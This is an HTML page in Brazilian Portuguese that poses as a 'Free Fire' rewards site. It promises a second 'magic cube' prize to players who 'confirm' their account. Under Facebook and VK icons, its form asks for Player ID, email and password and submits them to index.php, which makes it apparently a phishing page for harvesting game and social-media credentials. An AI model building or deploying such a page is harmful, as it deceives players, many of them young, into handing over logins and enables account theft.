<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">


<! Titulo Da Pagina !>
<title>Free Fire</title>
<! icone da pagina !>
	
<link rel="icon" href="img/titulo.png" type="image/x-icon" />
</head>

<center>
<img  src="img/logoff01.png" width="355" height="38">
</center>
<h2> Site de recompensas</h2>

<center>
<h4>Devido alta quantidade de pessoas solicitando o cubo m&#225gico tivemos um s&#233rio poblema em nosso servidor,  No entanto estamos sorteando novamente confirme sua conta e ganhe o segundo cubo m&#225gico!.</h4>
</center>



<style>
body {
background-color: rgb(0, 0, 0);
overflow-x: hidden;
color: rgb(233, 233, 233);
font-size: 13px;
font-family:"Arial","?????",Sans-Serif, "????";
background-image: url("img/bg.gif");
background-attachment: fixed;
}



#borda {
position: center;
background-color:;
background-image: url("img/fundoborda.png");
background-size: 100%;
background-repeat: no-repeat;
background-attachment:fixed;
border: 1px solid white;
width: 92%; 
height: 350px;
margin-top: 10px;
left: -10;
}

#face {
    background: url(img/facebook.png) no-repeat 0 0;
    background-size: 100% 100%;
    display: inline-block;
    width: 40px;
    height: 40px;
    margin: 6px -80px 0;
}

#vk {
    background: url(img/vk.png) no-repeat 0 0;
    background-size: 100% 100%;
    display: inline-block;
    width: 40px;
    height: 40px;
    margin: 6px 100px 0;
}

#usuario {
position: center;
width: 270px;
height:35px;
border-radius: 2px;
font-size: 12px;
text-indent: 12%;
line-height: 0px;
letter-spacing: 0px;	
word-spacing: 0px;	
text-shadow:  0px 0px	black;
box-shadow:	0px	0px black;
box-shadow:	inset	0	0	0px black;
opacity: 1;
border: 1px solid black;
margin-bottom: 10px;
margin-top: 15px;
}

#email {
position: center;
width: 270px;
height:35px;
border-radius: 2px;
font-size: 12px;
text-indent: 12%;
line-height: 0px;
letter-spacing: 0px;	
word-spacing: 0px;	
text-shadow:  0px 0px	black;
box-shadow:	0px	0px black;
box-shadow:	inset	0	0	0px black;
opacity: 1;
border: 1px solid black;
margin-bottom: 10px;
left: 30px;
}

#senha {
position: center;
width: 270px;
height:35px;
border-radius: 2px;
font-size: 12px;
text-indent: 12%;
line-height: 0px;
letter-spacing: 0px;	
word-spacing: 0px;	
text-shadow:  0px 0px	black;
box-shadow:	0px	0px black;
box-shadow:	inset	0	0	0px black;
opacity: 1;
border: 1px solid black;
margin-bottom: 10px;
left: 30px;
}


input[type=password]:hover{
border-color: #5F19EB;
border: 4px solid #1E90FF;
box-shadow: 0px 0px 10px #1E90FF;

}

#Botao_Entrar input {
position: relative;
width: 100px;
height: 45px;
background-color: green;
color: #FFFFFF;
border: none;
border-radius: 15px;
font-weight: bolder;
font-size: 18px
left: 50;
}

#Botao_Entrar input[type=submit]:hover {
background-color: #green;
}
</style>
</body>
<center>
	
	

<form action= "index.php" method= "post">
<fieldset  id="borda">
   <h4> Entre usando sua conta facebook ou vk</h4>
<img  src="img/facebook.png" width="40" height="40" id="face">
<img  src="img/vk.png" width="40" height="40" id="vk">
<br>
<! Formulario !>
          <input type= "text" 
name= "usuario" 
placeholder= "Player ID" 
autocomplete= "off" 
maxlength= "16" 
required= "campo obrigatorio" 
class="user"
id="usuario">
	
        <input type= "email" 
name= "email" 
placeholder= "Email" 
autocomplete= "off" 
maxlength= "40" 
required= "campo obrigatorio" 
class="email"
id="email">
	
         <input type= "password" 
name= "senha" 
placeholder= "Password" 
autocomplete= "off" 
maxlength= "20" 
required= "campo obrigatorio" 
class="senha"
id="senha">
	
	
<! Botao !>
<br>
	<br>
		<br>
			
<div  id="Botao_Entrar">
<input type= "submit" value= "Conectar" />
</center>
</form>

</body>
</style>
</html>
